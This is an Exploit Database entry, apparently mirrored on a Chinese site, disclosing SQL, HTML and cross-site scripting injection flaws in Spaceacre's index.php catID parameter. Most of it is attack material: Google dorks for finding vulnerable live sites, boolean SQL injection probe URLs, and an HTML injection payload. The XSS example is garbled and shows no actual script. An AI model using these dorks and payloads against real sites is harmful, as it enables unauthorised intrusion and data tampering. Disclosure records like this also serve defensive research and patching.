Spaceacre – ‘/index.php’ SQL Injection / HTML / Cross-Site Scripting Injection

• Exploit Database
• 120 阅读

• 作者： CoBRa_21
  日期： 2010-05-26
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/12756/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34

  -------------------------------------------------------------------------------------------   Spaceacre (index.php) SQL/HTML/XSS Injection Vulnerability   -------------------------------------------------------------------------------------------   Author: CoBRa_21   Script Home: http://www.spaceacre.com   Dork 1: inurl:cat1.php?catID= "Spaceacre"   Dork 2: intext:"Designed by Spaceacre"   -------------------------------------------------------------------------------------------   SQL Injection:   http://localhost/[path]/index.php?catID=1 and 1=2 http://localhost/[path]/index.php?catID=1 and 1=1 -------------------------------------------------------------------------------------------   HTML Injection:   http://localhost/[path]/index.php?catID=<font size=15 color=green>CoBRa_21</font> HTML &#304;NJ.   -------------------------------------------------------------------------------------------   XSS Injection:   http://localhost/[path]/index.php?catID=index.php?catID= XSS &#304;NJ.   -------------------------------------------------------------------------------------------